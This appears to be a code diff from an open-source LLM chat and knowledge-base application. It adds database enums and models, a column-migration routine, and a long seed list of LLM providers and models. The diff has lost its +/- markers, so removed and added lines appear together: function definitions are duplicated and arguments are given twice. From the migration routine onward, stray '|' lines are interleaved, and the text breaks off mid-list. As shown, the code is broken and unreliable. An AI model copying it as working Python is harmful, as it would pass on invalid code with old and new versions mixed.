# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

NAME_LENGTH_LIMIT = 2 ** 10
@@ -45,6 +45,8 @@ class FileType(StrEnum):
    VISUAL = 'visual'
    AURAL = 'aural'
    VIRTUAL = 'virtual'
    FOLDER = 'folder'
    OTHER = "other"


class LLMType(StrEnum):
@@ -52,6 +54,7 @@ class LLMType(StrEnum):
    EMBEDDING = 'embedding'
    SPEECH2TEXT = 'speech2text'
    IMAGE2TEXT = 'image2text'
    RERANK = 'rerank'


class ChatStyle(StrEnum):
@@ -62,6 +65,7 @@ class ChatStyle(StrEnum):


class TaskStatus(StrEnum):
    UNSTART = "0"
    RUNNING = "1"
    CANCEL = "2"
    DONE = "3"
@@ -80,3 +84,16 @@ class ParserType(StrEnum):
    NAIVE = "naive"
    PICTURE = "picture"
    ONE = "one"


class FileSource(StrEnum):
    LOCAL = ""
    KNOWLEDGEBASE = "knowledgebase"
    S3 = "s3"


class CanvasType(StrEnum):
    ChatBot = "chatbot"
    DocBot = "docbot"

KNOWLEDGEBASE_FOLDER_NAME=".knowledgebase"
@@ -21,14 +21,13 @@ import operator
from functools import wraps
from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer
from flask_login import UserMixin

from playhouse.migrate import MySQLMigrator, migrate
from peewee import (
    BigAutoField, BigIntegerField, BooleanField, CharField,
    CompositeKey, Insert, IntegerField, TextField, FloatField, DateTimeField,
    BigIntegerField, BooleanField, CharField,
    CompositeKey, IntegerField, TextField, FloatField, DateTimeField,
    Field, Model, Metadata
)
from playhouse.pool import PooledMySQLDatabase

from api.db import SerializedType, ParserType
from api.settings import DATABASE, stat_logger, SECRET_KEY
from api.utils.log_utils import getLogger
@@ -344,7 +343,7 @@ class DataBaseModel(BaseModel):


@DB.connection_context()
def init_database_tables():
def init_database_tables(alter_fields=[]):
    members = inspect.getmembers(sys.modules[__name__], inspect.isclass)
    table_objs = []
    create_failed_list = []
@@ -361,6 +360,7 @@ def init_database_tables():
    if create_failed_list:
        LOGGER.info(f"create tables failed: {create_failed_list}")
        raise Exception(f"create tables failed: {create_failed_list}")
    migrate_db()


def fill_db_model_object(model_object, human_model_dict):
@@ -386,7 +386,7 @@ class User(DataBaseModel, UserMixin):
        max_length=32,
        null=True,
        help_text="English|Chinese",
        default="English")
        default="Chinese" if "zh_CN" in os.getenv("LANG", "") else "English")
    color_schema = CharField(
        max_length=32,
        null=True,
@@ -437,6 +437,10 @@ class Tenant(DataBaseModel):
        max_length=128,
        null=False,
        help_text="default image to text model ID")
    rerank_id = CharField(
        max_length=128,
        null=False,
        help_text="default rerank model ID")
    parser_ids = CharField(
        max_length=256,
        null=False,
@@ -578,7 +582,7 @@ class Knowledgebase(DataBaseModel):
    language = CharField(
        max_length=32,
        null=True,
        default="English",
        default="Chinese" if "zh_CN" in os.getenv("LANG", "") else "English",
        help_text="English|Chinese")
    description = TextField(null=True, help_text="KB description")
    embd_id = CharField(
@@ -629,7 +633,7 @@ class Document(DataBaseModel):
        max_length=128,
        null=False,
        default="local",
        help_text="where dose this document from")
        help_text="where dose this document come from")
    type = CharField(max_length=32, null=False, help_text="file extension")
    created_by = CharField(
        max_length=32,
@@ -669,6 +673,66 @@ class Document(DataBaseModel):
        db_table = "document"

class File(DataBaseModel):
    id = CharField(
        max_length=32,
        primary_key=True,
    )
    parent_id = CharField(
        max_length=32,
        null=False,
        help_text="parent folder id",
        index=True)
    tenant_id = CharField(
        max_length=32,
        null=False,
        help_text="tenant id",
        index=True)
    created_by = CharField(
        max_length=32,
        null=False,
        help_text="who created it")
    name = CharField(
        max_length=255,
        null=False,
        help_text="file name or folder name",
        index=True)
    location = CharField(
        max_length=255,
        null=True,
        help_text="where dose it store")
    size = IntegerField(default=0)
    type = CharField(max_length=32, null=False, help_text="file extension")
    source_type = CharField(
        max_length=128,
        null=False,
        default="",
        help_text="where dose this document come from")

    class Meta:
        db_table = "file"


class File2Document(DataBaseModel):
    id = CharField(
        max_length=32,
        primary_key=True,
    )
    file_id = CharField(
        max_length=32,
        null=True,
        help_text="file id",
        index=True)
    document_id = CharField(
        max_length=32,
        null=True,
        help_text="document id",
        index=True)

    class Meta:
        db_table = "file2document"

class Task(DataBaseModel):
    id = CharField(max_length=32, primary_key=True)
    doc_id = CharField(max_length=32, null=False, index=True)
@@ -695,11 +759,11 @@ class Dialog(DataBaseModel):
    language = CharField(
        max_length=32,
        null=True,
        default="Chinese",
        default="Chinese" if "zh_CN" in os.getenv("LANG", "") else "English",
        help_text="English|Chinese")
    llm_id = CharField(max_length=32, null=False, help_text="default llm ID")
    llm_id = CharField(max_length=128, null=False, help_text="default llm ID")
    llm_setting = JSONField(null=False, default={"temperature": 0.1, "top_p": 0.3, "frequency_penalty": 0.7,
                                                 "presence_penalty": 0.4, "max_tokens": 215})
                                                 "presence_penalty": 0.4, "max_tokens": 512})
    prompt_type = CharField(
        max_length=16,
        null=False,
@@ -711,11 +775,16 @@ class Dialog(DataBaseModel):
    similarity_threshold = FloatField(default=0.2)
    vector_similarity_weight = FloatField(default=0.3)
    top_n = IntegerField(default=6)
    top_k = IntegerField(default=1024)
    do_refer = CharField(
        max_length=1,
        null=False,
        help_text="it needs to insert reference index into answer or not",
        default="1")
    rerank_id = CharField(
        max_length=128,
        null=False,
        help_text="default rerank model ID")

    kb_ids = JSONField(null=False, default=[])
    status = CharField(
@@ -762,3 +831,57 @@ class API4Conversation(DataBaseModel):

    class Meta:
        db_table = "api_4_conversation"


class UserCanvas(DataBaseModel):
    id = CharField(max_length=32, primary_key=True)
    avatar = TextField(null=True, help_text="avatar base64 string")
    user_id = CharField(max_length=255, null=False, help_text="user_id")
    title = CharField(max_length=255, null=True, help_text="Canvas title")
    description = TextField(null=True, help_text="Canvas description")
    canvas_type = CharField(max_length=32, null=True, help_text="Canvas type")
    dsl = JSONField(null=True, default={})

    class Meta:
        db_table = "user_canvas"


class CanvasTemplate(DataBaseModel):
    id = CharField(max_length=32, primary_key=True)
    avatar = TextField(null=True, help_text="avatar base64 string")
    title = CharField(max_length=255, null=True, help_text="Canvas title")
    description = TextField(null=True, help_text="Canvas description")
    canvas_type = CharField(max_length=32, null=True, help_text="Canvas type")
    dsl = JSONField(null=True, default={})

    class Meta:
        db_table = "canvas_template"

def migrate_db():
|
||||
with DB.transaction():
|
||||
migrator = MySQLMigrator(DB)
|
||||
try:
|
||||
migrate(
|
||||
migrator.add_column('file', 'source_type', CharField(max_length=128, null=False, default="", help_text="where dose this document come from"))
|
||||
)
|
||||
except Exception as e:
|
||||
pass
|
||||
try:
|
||||
migrate(
|
||||
migrator.add_column('tenant', 'rerank_id', CharField(max_length=128, null=False, default="BAAI/bge-reranker-v2-m3", help_text="default rerank model ID"))
|
||||
)
|
||||
except Exception as e:
|
||||
pass
|
||||
try:
|
||||
migrate(
|
||||
migrator.add_column('dialog', 'rerank_id', CharField(max_length=128, null=False, default="", help_text="default rerank model ID"))
|
||||
)
|
||||
except Exception as e:
|
||||
pass
|
||||
try:
|
||||
migrate(
|
||||
migrator.add_column('dialog', 'top_k', IntegerField(default=1024))
|
||||
)
|
||||
except Exception as e:
|
||||
pass
|
||||
|
||||
@ -13,16 +13,22 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
import os
|
||||
import time
|
||||
import uuid
|
||||
from copy import deepcopy
|
||||
|
||||
from api.db import LLMType, UserTenantRole
|
||||
from api.db.db_models import init_database_tables as init_web_db, LLMFactories, LLM, TenantLLM
|
||||
from api.db.services import UserService
|
||||
from api.db.services.canvas_service import CanvasTemplateService
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMFactoriesService, LLMService, TenantLLMService, LLMBundle
|
||||
from api.db.services.user_service import TenantService, UserTenantService
|
||||
from api.settings import CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, LLM_FACTORY, API_KEY, LLM_BASE_URL
|
||||
from api.utils.file_utils import get_project_base_directory
|
||||
|
||||
|
||||
def init_superuser():
|
||||
@ -120,11 +126,56 @@ factory_infos = [{
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "QAnything",
|
||||
"name": "Youdao",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
},
|
||||
},{
|
||||
"name": "DeepSeek",
|
||||
"logo": "",
|
||||
"tags": "LLM",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "VolcEngine",
|
||||
"logo": "",
|
||||
"tags": "LLM, TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "BaiChuan",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "Jina",
|
||||
"logo": "",
|
||||
"tags": "TEXT EMBEDDING, TEXT RE-RANK",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "BAAI",
|
||||
"logo": "",
|
||||
"tags": "TEXT EMBEDDING, TEXT RE-RANK",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "MiniMax",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "Mistral",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "Azure-OpenAI",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "Bedrock",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
}
|
||||
# {
|
||||
# "name": "文心一言",
|
||||
# "logo": "",
|
||||
@ -138,6 +189,12 @@ def init_llm_factory():
|
||||
llm_infos = [
|
||||
# ---------------------- OpenAI ------------------------
|
||||
{
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-4o",
|
||||
"tags": "LLM,CHAT,128K",
|
||||
"max_tokens": 128000,
|
||||
"model_type": LLMType.CHAT.value + "," + LLMType.IMAGE2TEXT.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-3.5-turbo",
|
||||
"tags": "LLM,CHAT,4K",
|
||||
@ -155,6 +212,18 @@ def init_llm_factory():
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "text-embedding-3-small",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "text-embedding-3-large",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "whisper-1",
|
||||
@ -323,7 +392,7 @@ def init_llm_factory():
|
||||
"max_tokens": 2147483648,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
# ------------------------ QAnything -----------------------
|
||||
# ------------------------ Youdao -----------------------
|
||||
{
|
||||
"fid": factory_infos[7]["name"],
|
||||
"llm_name": "maidalun1020/bce-embedding-base_v1",
|
||||
@ -331,6 +400,505 @@ def init_llm_factory():
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[7]["name"],
|
||||
"llm_name": "maidalun1020/bce-reranker-base_v1",
|
||||
"tags": "RE-RANK, 512",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.RERANK.value
|
||||
},
|
||||
# ------------------------ DeepSeek -----------------------
|
||||
{
|
||||
"fid": factory_infos[8]["name"],
|
||||
"llm_name": "deepseek-chat",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[8]["name"],
|
||||
"llm_name": "deepseek-coder",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 16385,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
# ------------------------ VolcEngine -----------------------
|
||||
{
|
||||
"fid": factory_infos[9]["name"],
|
||||
"llm_name": "Skylark2-pro-32k",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[9]["name"],
|
||||
"llm_name": "Skylark2-pro-4k",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
# ------------------------ BaiChuan -----------------------
|
||||
{
|
||||
"fid": factory_infos[10]["name"],
|
||||
"llm_name": "Baichuan2-Turbo",
|
||||
"tags": "LLM,CHAT,32K",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[10]["name"],
|
||||
"llm_name": "Baichuan2-Turbo-192k",
|
||||
"tags": "LLM,CHAT,192K",
|
||||
"max_tokens": 196608,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[10]["name"],
|
||||
"llm_name": "Baichuan3-Turbo",
|
||||
"tags": "LLM,CHAT,32K",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[10]["name"],
|
||||
"llm_name": "Baichuan3-Turbo-128k",
|
||||
"tags": "LLM,CHAT,128K",
|
||||
"max_tokens": 131072,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[10]["name"],
|
||||
"llm_name": "Baichuan4",
|
||||
"tags": "LLM,CHAT,128K",
|
||||
"max_tokens": 131072,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[10]["name"],
|
||||
"llm_name": "Baichuan-Text-Embedding",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
# ------------------------ Jina -----------------------
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-reranker-v1-base-en",
|
||||
"tags": "RE-RANK,8k",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.RERANK.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-reranker-v1-turbo-en",
|
||||
"tags": "RE-RANK,8k",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.RERANK.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-reranker-v1-tiny-en",
|
||||
"tags": "RE-RANK,8k",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.RERANK.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-colbert-v1-en",
|
||||
"tags": "RE-RANK,8k",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.RERANK.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-embeddings-v2-base-en",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-embeddings-v2-base-de",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-embeddings-v2-base-es",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-embeddings-v2-base-code",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-embeddings-v2-base-zh",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
# ------------------------ BAAI -----------------------
|
||||
{
|
||||
"fid": factory_infos[12]["name"],
|
||||
"llm_name": "BAAI/bge-large-zh-v1.5",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 1024,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[12]["name"],
|
||||
"llm_name": "BAAI/bge-reranker-v2-m3",
|
||||
"tags": "RE-RANK,2k",
|
||||
"max_tokens": 2048,
|
||||
"model_type": LLMType.RERANK.value
|
||||
},
|
||||
# ------------------------ Minimax -----------------------
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab6.5-chat",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab6.5s-chat",
|
||||
"tags": "LLM,CHAT,245k",
|
||||
"max_tokens": 245760,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab6.5t-chat",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab6.5g-chat",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab5.5-chat",
|
||||
"tags": "LLM,CHAT,16k",
|
||||
"max_tokens": 16384,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab5.5s-chat",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
# ------------------------ Mistral -----------------------
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "open-mixtral-8x22b",
|
||||
"tags": "LLM,CHAT,64k",
|
||||
"max_tokens": 64000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "open-mixtral-8x7b",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "open-mistral-7b",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "mistral-large-latest",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "mistral-small-latest",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "mistral-medium-latest",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "codestral-latest",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "mistral-embed",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.EMBEDDING
|
||||
},
|
||||
# ------------------------ Azure OpenAI -----------------------
|
||||
# Please ensure the llm_name is the same as the name in Azure
|
||||
# OpenAI deployment name (e.g., azure-gpt-4o). And the llm_name
|
||||
# must different from the OpenAI llm_name
|
||||
#
|
||||
# Each model must be deployed in the Azure OpenAI service, otherwise,
|
||||
# you will receive an error message 'The API deployment for
|
||||
# this resource does not exist'
|
||||
{
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4o",
|
||||
"tags": "LLM,CHAT,128K",
|
||||
"max_tokens": 128000,
|
||||
"model_type": LLMType.CHAT.value + "," + LLMType.IMAGE2TEXT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-35-turbo",
|
||||
"tags": "LLM,CHAT,4K",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-35-turbo-16k",
|
||||
"tags": "LLM,CHAT,16k",
|
||||
"max_tokens": 16385,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-text-embedding-ada-002",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-text-embedding-3-small",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-text-embedding-3-large",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},{
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-whisper-1",
|
||||
"tags": "SPEECH2TEXT",
|
||||
"max_tokens": 25 * 1024 * 1024,
|
||||
"model_type": LLMType.SPEECH2TEXT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4",
|
||||
"tags": "LLM,CHAT,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4-turbo",
|
||||
"tags": "LLM,CHAT,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4-32k",
|
||||
"tags": "LLM,CHAT,32K",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4-vision-preview",
|
||||
"tags": "LLM,CHAT,IMAGE2TEXT",
|
||||
"max_tokens": 765,
|
||||
"model_type": LLMType.IMAGE2TEXT.value
|
||||
},
|
||||
# ------------------------ Bedrock -----------------------
|
||||
{
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "ai21.j2-ultra-v1",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "ai21.j2-mid-v1",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.command-text-v14",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.command-light-text-v14",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.command-r-v1:0",
|
||||
"tags": "LLM,CHAT,128k",
|
||||
"max_tokens": 128 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.command-r-plus-v1:0",
|
||||
"tags": "LLM,CHAT,128k",
|
||||
"max_tokens": 128000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-v2",
|
||||
"tags": "LLM,CHAT,100k",
|
||||
"max_tokens": 100 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-v2:1",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-3-sonnet-20240229-v1:0",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-3-5-sonnet-20240620-v1:0",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-3-haiku-20240307-v1:0",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-3-opus-20240229-v1:0",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-instant-v1",
|
||||
"tags": "LLM,CHAT,100k",
|
||||
"max_tokens": 100 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "amazon.titan-text-express-v1",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "amazon.titan-text-premier-v1:0",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "amazon.titan-text-lite-v1",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "meta.llama2-13b-chat-v1",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "meta.llama2-70b-chat-v1",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "meta.llama3-8b-instruct-v1:0",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "meta.llama3-70b-instruct-v1:0",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "mistral.mistral-7b-instruct-v0:2",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "mistral.mixtral-8x7b-instruct-v0:1",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "mistral.mistral-large-2402-v1:0",
|
||||
